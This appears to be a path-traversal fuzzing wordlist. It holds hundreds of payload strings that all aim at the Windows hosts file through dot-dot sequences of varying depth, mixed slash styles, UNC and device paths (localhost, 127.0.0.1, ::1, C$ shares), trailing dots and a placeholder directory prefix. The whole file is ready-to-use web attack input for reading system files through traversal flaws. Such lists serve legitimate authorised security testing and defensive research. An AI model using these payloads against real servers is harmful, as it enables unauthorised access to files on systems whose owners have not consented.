\/127.0.0.1\C$/Windows///////\system32/drivers//////\etc/hosts.......     
//./C:/Windows/system32/drivers/etc/hosts
\/./C:/Windows/system32/drivers/etc/hosts
/\./C:/Windows/system32/drivers/etc/hosts
\\.\C:\Windows\system32\drivers\etc\hosts
\/.\C:\Windows\system32\drivers\etc\hosts
/\.\C:\Windows\system32\drivers\etc\hosts
//./C:/Windows/system32/drivers/etc/hosts.
\/./C:/Windows/system32/drivers/etc/hosts.
/\./C:/Windows/system32/drivers/etc/hosts.
\\.\C:\Windows\system32\drivers\etc\hosts.
\/.\C:\Windows\system32\drivers\etc\hosts.
/\.\C:\Windows\system32\drivers\etc\hosts.
\\?\C:\Windows\system32\drivers\etc\hosts
\/?\C:\Windows\system32\drivers\etc\hosts
/\?\C:\Windows\system32\drivers\etc\hosts
//?/C:/Windows/system32/drivers/etc/hosts
\/?/C:/Windows/system32/drivers/etc/hosts
/\?/C:/Windows/system32/drivers/etc/hosts
\\localhost\C$\Windows\system32\drivers\etc\hosts
\/localhost\C$\Windows\system32\drivers\etc\hosts
/\localhost\C$\Windows\system32\drivers\etc\hosts
//localhost/C$/Windows/system32/drivers/etc/hosts
\/localhost/C$/Windows/system32/drivers/etc/hosts
/\localhost/C$/Windows/system32/drivers/etc/hosts
\\localhost\C$\Windows\system32\drivers\etc\hosts.
\/localhost\C$\Windows\system32\drivers\etc\hosts.
/\localhost\C$\Windows\system32\drivers\etc\hosts.
//localhost/C$/Windows/system32/drivers/etc/hosts.
\/localhost/C$/Windows/system32/drivers/etc/hosts.
/\localhost/C$/Windows/system32/drivers/etc/hosts.
\\127.0.0.1\C$\Windows\system32\drivers\etc\hosts
\/127.0.0.1\C$\Windows\system32\drivers\etc\hosts
/\127.0.0.1\C$\Windows\system32\drivers\etc\hosts
//127.0.0.1/C$/Windows/system32/drivers/etc/hosts
\/127.0.0.1/C$/Windows/system32/drivers/etc/hosts
/\127.0.0.1/C$/Windows/system32/drivers/etc/hosts
\\127.0.0.1\C$\Windows\system32\drivers\etc\hosts.
\/127.0.0.1\C$\Windows\system32\drivers\etc\hosts.
/\127.0.0.1\C$\Windows\system32\drivers\etc\hosts.
//127.0.0.1/C$/Windows/system32/drivers/etc/hosts.
\/127.0.0.1/C$/Windows/system32/drivers/etc/hosts.
/\127.0.0.1/C$/Windows/system32/drivers/etc/hosts.
//::1/C$/Windows/system32/drivers/etc/hosts
\/::1/C$/Windows/system32/drivers/etc/hosts
/\::1/C$/Windows/system32/drivers/etc/hosts
\\::1\C$\Windows\system32\drivers\etc\hosts
\/::1\C$\Windows\system32\drivers\etc\hosts
/\::1\C$\Windows\system32\drivers\etc\hosts
//::1/C$/Windows/system32/drivers/etc/hosts.
\/::1/C$/Windows/system32/drivers/etc/hosts.
/\::1/C$/Windows/system32/drivers/etc/hosts.
\\::1\C$\Windows\system32\drivers\etc\hosts.
\/::1\C$\Windows\system32\drivers\etc\hosts.
/\::1\C$\Windows\system32\drivers\etc\hosts.
C:..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\Windows\system32\drivers\etc\hosts
C:..\Windows\system32\drivers\etc\hosts
C:../../../../../../../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../Windows/system32/drivers/etc/hosts
C:../../../../Windows/system32/drivers/etc/hosts
C:../../../Windows/system32/drivers/etc/hosts
C:../../Windows/system32/drivers/etc/hosts
C:../Windows/system32/drivers/etc/hosts
..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\Windows\system32\drivers\etc\hosts
..\..\Windows\system32\drivers\etc\hosts
..\Windows\system32\drivers\etc\hosts
..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts
..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts
..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts
..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts
..\\..\\..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts
..\\..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts
..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts
..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts
..\\..\\..\\..\\Windows\system32\drivers\etc\hosts
..\\..\\..\\Windows\system32\drivers\etc\hosts
..\\..\\Windows\system32\drivers\etc\hosts
..\\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\Windows\system32\drivers\etc\hosts.
..\..\Windows\system32\drivers\etc\hosts.
..\Windows\system32\drivers\etc\hosts.
../../../../../../../../../../../../Windows/system32/drivers/etc/hosts
../../../../../../../../../../../Windows/system32/drivers/etc/hosts
../../../../../../../../../../Windows/system32/drivers/etc/hosts
../../../../../../../../../Windows/system32/drivers/etc/hosts
../../../../../../../../Windows/system32/drivers/etc/hosts
../../../../../../../Windows/system32/drivers/etc/hosts
../../../../../../Windows/system32/drivers/etc/hosts
../../../../../Windows/system32/drivers/etc/hosts
../../../../Windows/system32/drivers/etc/hosts
../../../Windows/system32/drivers/etc/hosts
../../Windows/system32/drivers/etc/hosts
../Windows/system32/drivers/etc/hosts
..//..//..//..//..//..//..//..//..//..//..//..//Windows/system32/drivers/etc/hosts
..//..//..//..//..//..//..//..//..//..//..//Windows/system32/drivers/etc/hosts
..//..//..//..//..//..//..//..//..//..//Windows/system32/drivers/etc/hosts
..//..//..//..//..//..//..//..//..//Windows/system32/drivers/etc/hosts
..//..//..//..//..//..//..//..//Windows/system32/drivers/etc/hosts
..//..//..//..//..//..//..//Windows/system32/drivers/etc/hosts
..//..//..//..//..//..//Windows/system32/drivers/etc/hosts
..//..//..//..//..//Windows/system32/drivers/etc/hosts
..//..//..//..//Windows/system32/drivers/etc/hosts
..//..//..//Windows/system32/drivers/etc/hosts
..//..//Windows/system32/drivers/etc/hosts
..//Windows/system32/drivers/etc/hosts
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts
..\/..\/..\/..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts
..\/..\/..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts
..\/..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts
..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts
..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts
..\/..\/..\/..\/Windows/system32/drivers/etc/hosts
..\/..\/..\/Windows/system32/drivers/etc/hosts
..\/..\/Windows/system32/drivers/etc/hosts
..\/Windows/system32/drivers/etc/hosts
../\../\../\../\../\../\../\../\../\../\../\../\Windows/system32/drivers/etc/hosts
../\../\../\../\../\../\../\../\../\../\../\Windows/system32/drivers/etc/hosts
../\../\../\../\../\../\../\../\../\../\Windows/system32/drivers/etc/hosts
../\../\../\../\../\../\../\../\../\Windows/system32/drivers/etc/hosts
../\../\../\../\../\../\../\../\Windows/system32/drivers/etc/hosts
../\../\../\../\../\../\../\Windows/system32/drivers/etc/hosts
../\../\../\../\../\../\Windows/system32/drivers/etc/hosts
../\../\../\../\../\Windows/system32/drivers/etc/hosts
../\../\../\../\Windows/system32/drivers/etc/hosts
../\../\../\Windows/system32/drivers/etc/hosts
../\../\Windows/system32/drivers/etc/hosts
../\Windows/system32/drivers/etc/hosts
../../../../../../../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../Windows/system32/drivers/etc/hosts.
../../../../Windows/system32/drivers/etc/hosts.
../../../Windows/system32/drivers/etc/hosts.
../../Windows/system32/drivers/etc/hosts.
../Windows/system32/drivers/etc/hosts.
../..\../..\../..\../..\../..\../..\Windows/system32\drivers/etc\hosts
../..\../..\../..\../..\../..\..\Windows/system32\drivers/etc\hosts
../..\../..\../..\../..\../..\Windows/system32\drivers/etc\hosts
../..\../..\../..\../..\..\Windows/system32\drivers/etc\hosts
../..\../..\../..\../..\Windows/system32\drivers/etc\hosts
../..\../..\../..\..\Windows/system32\drivers/etc\hosts
../..\../..\../..\Windows/system32\drivers/etc\hosts
../..\../..\..\Windows/system32\drivers/etc\hosts
../..\../..\Windows/system32\drivers/etc\hosts
../..\..\Windows/system32\drivers/etc\hosts
../..\Windows/system32\drivers/etc\hosts
../\Windows/system32\drivers/etc\hosts
RANDOMDIR..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\Windows\system32\drivers\etc\hosts
RANDOMDIR../../../../../../../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../../Windows/system32/drivers/etc/hosts
RANDOMDIR../../Windows/system32/drivers/etc/hosts
RANDOMDIR../Windows/system32/drivers/etc/hosts
C:/Windows/system32/drivers/etc/hosts
C:\Windows\system32\drivers\etc\hosts
C:/Windows/system32/drivers/etc/hosts.
C:\Windows\system32\drivers\etc\hosts.
